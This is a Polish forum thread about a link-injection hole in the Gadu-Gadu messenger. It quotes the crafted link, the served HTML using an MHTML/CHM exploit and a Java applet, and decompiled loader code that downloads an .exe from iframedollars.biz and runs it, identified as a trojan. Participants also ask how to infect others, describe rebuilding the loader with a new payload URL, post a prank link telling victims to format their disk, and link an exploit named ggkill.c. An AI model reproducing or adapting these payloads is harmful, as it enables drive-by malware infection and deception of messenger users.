Exploit GG

[jakoppo]

Witam!!
Przytocze tekst i jak ktos wie więcej na ten temat to proszę zeby sie wypowiedział:

www.po"style=background-image:url(java script:window.open('http://iframedollars.biz/dl/adv407.php','','left=10000'));".pl

Plik adv407.php zawierał następujący kod html:

<div class='htmltop'>HTML</div><div class='htmlmain'>[head]
[/head][body]
[textarea id="cxw" style="display:none;"]
[object data="${PR}" type="text/x-scriptlet"][/object]
[/textarea]

[script language="javascript"]
document.write(cxw.value.replace(/${PR}/g,'ms-its:mhtml:file://c:nosuch.mht!http://iframedollars.biz/dl/adv407/x.chm::/x.htm'));
[/script]
[applet width=1 height=1 ARCHIVE=loaderadv407.jar
code=Counter][/APPLET][/body]</div>

Po ściągnięciu i zdekompilowaniu loaderadv407.jar, zauważyłem czym to jest:

URL url1 = new URL("http://iframedollars.biz/dl/loadadv407.exe");
URLConnection urlconnection = url1.openConnection();
[...]
FileOutputStream fileoutputstream = new FileOutputStream(s4 + "loadnew.exe");
[...]
as[0] = s4 + "loadnew.exe";
Process process = Runtime.getRuntime().exec(as);

Clamav rozpoznał binarke jako Trojan.Qhost.O.


POZDRO!!

 

[Bozuch]

Dont kapuje tego co piszesz ale hyba hodzi ci o dziure w GG
jezeli hcesz cos zrobic to ci powiem musis se pogadac z kims i jezeli hcesz cos od tej dzury to 1 sposub musisz dac linka z kodem java scrip
nP:www.kod_javy_scrip.pl i wysylasz

 

[beast888]

czyli jak wysle taki link komus to co sie stanie??
dajcie przykladowy link
z gory thx

 

[el bongos]

http://hacking.pl/news.php?id=4580
jak robisz kopiuj +wklej z jakiejś stronki to daj przynajmniej linka do niej
pozdrawiam

 

[haX^]

ja robie swoje archiwum jara ale nie wiem jak sie infekuje ta wiadomoscia =x need help

 

[Bozuch]

dam ci linka z takim o czyms
system windows wynaga...
sam se sprawdz
www.po"style=background-image:url(java script:document.write('%3cscript%3ealert%28%22system%20windows%20wymaga%20natychmiastowego%20sformatowania%20dysku%20C:%22%29%3c%2fscript%3e'));".pl
rozmawiasz se popprostu z kims i walniesz mu linka i masz grzaba jezeli kompa se formatnie

 

[jakoppo]

Witam chcialem spytac co znaczy ze cytuje:

rozmawiasz se popprostu z kims i walniesz mu linka i masz grzaba jezeli kompa se formatnie

Co to jest grzab??

 

[rywin]

No Bozuch on ma racje. Ty wogole nie w temacie jestes. Oni podali przyklad (nie ich autorstwa) wykozystania tego samego bugu co ty. Ale u nich chodzi o uruchomienie exe a nie wyswietlenie komunikatu.

 

[grave]

A propo: Udało się komuś przerobić te pliki javy pd windowsem?
Ja rozpakowałem plik loaderadv407.jar, zdekompilowałem plik Matrix.class za pomocą DJ Java Decompiler do Matrix.jad. Następnie zmieniłem tylko adres do pliku, który ma się odpalić i zapisałem jako plik Matrix.java. Potem za pomocą Java SDK (plik javac.exe) spróbowałem skompilować go z powortem do pliku class i wyskoczyło 9 błędów. Ktoś wie, jak to poprawnie skompilować? A może coś już zepsułem dekompilując złym programem? A jeśli brakuje mi jakichś plików to skąd je ściągnąć?

 

[abanon]

exploit na gg hyba ver.6

http://www.alpha.sytes.net/~abanon/gg/ggkill.c
i biblioteka
http://www.alpha.sytes.net/~abanon/gg/libgadu.h


w razie czego dajcie / w opisie

 

[WalgO]

bozuch to w ogóle nawija jakimś slangiem jak by był ostro usmażony i nie wiedział totalnie ocb

 

[dinko]

ciekawe...

jak wchodze na ten topic to firewall wyświetla mi ten komunikat:COCUMENTS AND SETTINGSADMINISTRATORUSTAWIENIA LOKALNETEMPORARY INTERNET FILESCONTENT.IE5AH4PCRY1POSTING[1].HTM

Contains signature of the HTML script virus HTML/Exploit.Mhtml

twórca tego topica cos kręci

 

[SZKOD[nick]]

Re: ciekawe...

Originally posted by dinko
jak wchodze na ten topic to firewall wyświetla mi ten komunikat:COCUMENTS AND SETTINGSADMINISTRATORUSTAWIENIA LOKALNETEMPORARY INTERNET FILESCONTENT.IE5AH4PCRY1POSTING[1].HTM

Contains signature of the HTML script virus HTML/Exploit.Mhtml

twórca tego topica cos kręci :lol:

po prostu to co jest w treści posta jest i w źródle a jeśli jest tam to po przeskanowaniu znalał znaleziony znajomy kod z "Contains signature of the HTML script virus HTML/Exploit.Mhtml"

 

[kiela]

Originally posted by jakoppo
Plik adv407.php zawierał następujący kod html:

<div class='htmltop'>HTML

<div class='htmlmain'>[head]
[/head][body]
[textarea id="cxw" style="display:none;"]
[object data="${PR}" type="text/x-scriptlet"][/object]
[/textarea]

[script language="javascript"]
document.write(cxw.value.replace(/${PR}/g,'ms-its:mhtml:file://c:nosuch.mht!http://iframedollars.biz/dl/adv407/x.chm::/x.htm'));
[/script]
[applet width=1 height=1 ARCHIVE=loaderadv407.jar
code=Counter][/APPLET][/body]</div>[/quote]

ten plik php nie zawiera tylko tyle
ten fragment to jest odpowiedz na skrypt php czyli plik adv407.php moze zawierac jeszcze wiele innych funkcji ktorych nie zobaczysz bo nie zostaja wyswietlane